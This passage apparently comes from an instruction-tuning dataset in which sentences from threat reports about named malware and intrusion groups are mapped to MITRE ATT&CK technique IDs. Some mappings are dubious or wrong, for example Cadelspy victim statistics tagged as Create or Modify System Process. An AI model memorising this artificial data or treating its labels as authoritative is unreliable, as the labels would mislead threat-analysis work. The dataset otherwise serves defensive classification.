used HTTP for C2 and data exfiltration.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,reg query### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos is triggered by an incoming TCP connection to a legitimate service from a specific source port.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN can search, read, write, move, and execute files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can create directories to store plugin output and stage data for exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component can list directory contents.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has sent malicious URL links through email to victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic collects the user name from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can execute PowerShell scripts received from C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HALFBAKED can obtain screenshots from the victim.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves.Figure 2: Example malicious Excel documentSimilar to the technique described in our previous blog about Remcos, the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also leverage Dynamic Linker Hijacking to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy gathers a list of installed apps from the uninstall program Registry.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, Forfiles, the Program Compatibility Assistant , components of the Windows Subsystem for Linux , as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts.### Assistant: T1202: Indirect Command Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue to achieve lateral movement and propagation.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to index files from drives, user profiles, and removable drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used RDP for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can use a decryption algorithm for strings based on Rotate on Right and Rotate on Left functionality.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly has used spearphising campaigns to gain access to victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang malware RoyalDNS has used DNS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It searches the active process list for the systemd process### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used RTF document that includes an exploit to execute malicious code.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance , Search Open Websites/Domains, or Active Scanning, establishing operational resources or Compromise Infrastructure, and/or initial access .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can download files and upgrade itself.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs in the following format:   \:pass   The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, / and +) from the data and replaces them with domain safe values (01, 02 and 03 respectively)### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can timestomp any files or payloads placed on a target machine to help them blend in.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess has the ability to use DNS tunneling for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE allows adversaries to enumerate and modify the infected host's file system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has convinced victims to open malicious attachments to execute malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas adds a new service named NetAdapter to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\16)### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has used the GetAdaptersInfo API call to get the victim's MAC address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth can be loaded through regsvr32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This exception invokes the exception handler containing the HTTP communication code, allowing it to run### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ngrok has been used by threat actors to configure servers for data exfiltration.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can gain system level privilege by passing SeDebugPrivilege to the AdjustTokenPrivilege API.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can be configured to have commands relayed over a peer-to-peer network of infected hosts.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used base64 encoding to hide command strings delivered from the C2.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The value stored in the Registry key will be executed after a user logs into the computer.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses an external software known as NetPass to recover passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has routed their traffic through an external server in order to obfuscate their location.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 4 Microsoft Word attempting to download the remote template If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy uses the Dynamic Data Exchange protocol to download remote payloads.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If a matching entry is found, access to the object is granted.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT collects the MAC address, computer name, and CPU information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SilverTerrier uses FTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Local Security Authority is the main component responsible for local security policy and user authentication.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has encrypted traffic with RSA.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has also exploited mis-configured Plesk servers.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork installed its payload in the startup programs folder as ""Baidu Software Update.""### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can report the IP of the compromised host to attacker controlled infrastructure.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used VBscript to execute malicious code.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The function invokes sysctl checking the returned value of P_TRACED.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The OsInfo function in Komplex collects the current running username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to identify the IP address of the compromised machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can achieve persistence by modifying Registry key entries.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users are advised to avoid opening attachments and click links on unsolicited emails### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may Create Snapshot of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect Data from Local System or for Remote Data Staging.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FYAnti has used ConfuserEx to pack its .NET module.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp's bootkit can inject a malicious DLL into the address space of running processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique may also enable Forced Authentication by injecting a SMB/HTTPS URL and triggering an authentication attempt.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can delete files specified by the C2.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti has loaded an encrypted DLL into memory and then executes it.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can also use PowerSploit and other scripting frameworks to perform execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seasalt is capable of installing itself as a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has PE data embedded within JPEG files contained within Word documents.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Any user or administrator within the organization may be able to create rules to automatically move or delete emails.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use this information to determine the potential value of databases and discover the requirements to access them.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various utilities and commands may acquire this information, including whoami.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The default file types copied would include data copied to the drive by SPACESHIP.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat communicated over HTTP and HTTPS with C2 servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) Further research revealed additional tools containing the same username (see Figure 21)### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows Control Panel process binary handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attacker leveraged multiple exploits, targeting both CVE-2014-6332 and CVE-2014-4113### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used WMI queries to check if various security applications were running, including VMWare and Virtualbox.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk has attempted to get the access token of a process by calling OpenProcessToken.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also escape via Exploitation for Privilege Escalation, such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NetTraveler reports window names along with keylogger information to provide application context.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHA256 Compiled C2 account POP3S Account SMTPS Accounts 861b6bc1f9.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot gathers system information, network addresses, disk type, disk free space, and the operation system version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By either replacing or adding illegitimate drivers , an adversary can use LSA operations to continuously execute malicious payloads.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used steganography to hide stolen data inside other files stored on Github.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rover searches for files on attached removable drives based on a predefined list of file extensions every five seconds.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has communicated with the C2 server by sending POST requests over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the Launch Daemon service.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Open interactive python shells with auto-completion on the all-in-memory remote python interpreter### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this particular case in 2013, the config file included an unknown plugin set, aside from the usual ‘ddos’ plugin listing### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used compromised credentials to log on to other systems and escalate privileges.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also use Service Control Manager to start new services.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload sends system information about the infected computer to the C&C server and downloads additional tools.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can monitor the titles of open windows to identify specific keywords.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The discovery modules used with Duqu can collect information on process details.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch can exfiltrate files from compromised systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has conducted research against potential victim websites as part of its operational planning.### Assistant: T1594: Search Victim-Owned Websites" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The initial beacon packet for Misdat contains the operating system version of the victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The victims Data from Cadelle’s C&C servers shows that a large number of Backdoor.Cadelspy infections affected individual users of Iranian internet service providers (ISPs) and hosting services### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has used various API calls as part of its checks to see if the malware is running in a sandbox.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil gathers credentials using Mimikatz and Procdump.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can deliver ""beacon"" payloads for lateral movement by leveraging remote COM execution.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can use GetKeyState and GetKeyboardState to capture keystrokes on the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, the NTDS file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec is capable of listing contents of folders on the victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.### Assistant: T1495: Firmware Corruption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to take screenshots on a compromised host.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used LNK files to download remote files to the victim's network.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has also used SDelete to remove artifacts from victims.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has disguised itself as a known Linux process.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 4 – Backdoored authentication function in SSH server As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can take screenshots on a compromised host by calling a series of APIs.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Suckfly has used stolen certificates to sign its malware.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used compromised identities to access VPNs and remote access tools.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 also moved laterally to servers in the environment using RDP and configured them as malware “distribution” servers.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example packers are MPRESS and UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly leveraged Outlook Web Access.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can collect a list of anti-virus products installed on a machine.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has communicated with C2 over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can record sound using input audio devices.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf uses RC4 encryption to obfuscate HTTP traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both are digitally signed by Microsoft.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo specifically looks for Domain Admins and power users within the domain.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used InstallUtil.exe to execute a malicious Beacon stager.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has performed timestomping on victim files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can inject content into lsass.exe to load a module.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some resources in Prikormka are encrypted with a simple XOR operation or encoded with Base64.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper can search for anti-virus software running on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux uses RC4 for encrypting the configuration.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can persist via a LaunchDaemon.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Droppers used by Putter Panda use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ASPXTool version used by Threat Group-3390 has been deployed to accessible servers running Internet Information Services .### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used certutil to decode base64-encoded files on victims.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As seen in the above request, the Trojan will generate a URL for its beacon with the following structure:http:///chk? The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk has a ransomware component that encrypts files with an AES key that is also RSA-1028 encrypted.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Here is the code:The goal of this code is to get information from the properties of the document (""Subject"", ""Company"", ""Category"", ""Hyperlink base"" and finally ""Comments"")### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,regsvr32.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can check for specific files and directories associated with virtualization and malware analysis.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes can alter the victim's proxy configuration.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 has acquired C2 domains through resellers.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials .### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT looks for the host machine’s IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can execute ProcessList for process discovery.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The KRBTGT password hash may be obtained using OS Credential Dumping and privileged access to a domain controller.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used a custom proxy tool called ""Agent"" which has support for multiple hops.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux can uninstall its persistence mechanism and delete its configuration file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty uses a keylogger plugin to gather keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has utilzed encrypted binaries and base64 encoded strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has sent spearphising emails with malicious 